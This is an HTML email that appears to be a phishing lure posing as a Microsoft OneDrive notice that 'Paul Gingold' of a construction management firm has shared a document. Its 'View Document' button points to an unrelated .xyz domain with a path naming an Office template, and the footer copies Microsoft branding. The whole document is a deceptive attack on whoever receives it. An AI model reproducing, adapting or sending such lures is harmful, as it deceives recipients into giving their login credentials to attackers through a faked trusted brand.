<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <title></title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  </head>
  <body style="font-family: 'Segoe UI Web Regular','Segoe UI Regular WestEuropean','Segoe UI',Tahoma,Arial,sans-serif; max-width: 820px; padding: ">
    <div style="margin:24px;">
      <div class="header">
       
      <div class="main">
        <div style="padding:30px;">
          <table>
            <tr>
              <td style="max-width:450px;"><img src="" alt="">
              </td>
              <td style="color:#555;">
                <h2>  Paul Gingold sent you a Document</h2>
                <a href="https://nortlittlroc.xyz/cma/office-new-RD85-real1-head-footer/" style="text-decoration:none;background:#A29088;border-radius:4px;padding-left:10px;padding-right:10px;padding-bottom:5px;padding-top:5px;color:#fff;">View Document</a>
              </td>
            </tr>
          </table>
        </div>
        <div style="background:#f2f2f2;padding:30px;">
          <table>
            <tr>
              <td style="max-width:160px;"><img src="https://dc625.4shared.com/img/9_M_56V4fi/s24/16b9e153370/sidekick_s.png" style="max-width: 160px; height:" alt="">
              </td>
              <td style="color:#555;">
                <h2>CM & Associates Construction Management</h2>
                <p>If you have any question regarding this document, send an email to Paul Gingold via pgingold@cm-assoc.net
                </p>
            The Management Team  </td>
            </tr>
          </table>
        </div>
        
      </div>
      <div class="footer" style="background:#A29088;padding:20px;">
        <div>
          <span style="font-size: 17px">Microsoft</span>
          <span style="color: #fff; text-decoration: none;     cursor: pointer;    font-size: 17px">OneDrive Support</span>
          <div>
            <ul>
              <li style="list-style:none;">
                <span style="font-size: 11px; margin: 5px;     color:#fff;">Sitemap</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">Privacy &amp; cookies</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">Terms of use</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">Trademarks</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">Safety &amp; eco</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">About our ads</span>
                <span style="font-size: 11px; margin: 5px;     color: #fff;">© Microsoft 2019</span>
              </li>
            </ul>
          </div>
          <div style="height:20px;">
          </div>
          
        </div>
        
      </div>
    </div>
  </body>
</html>
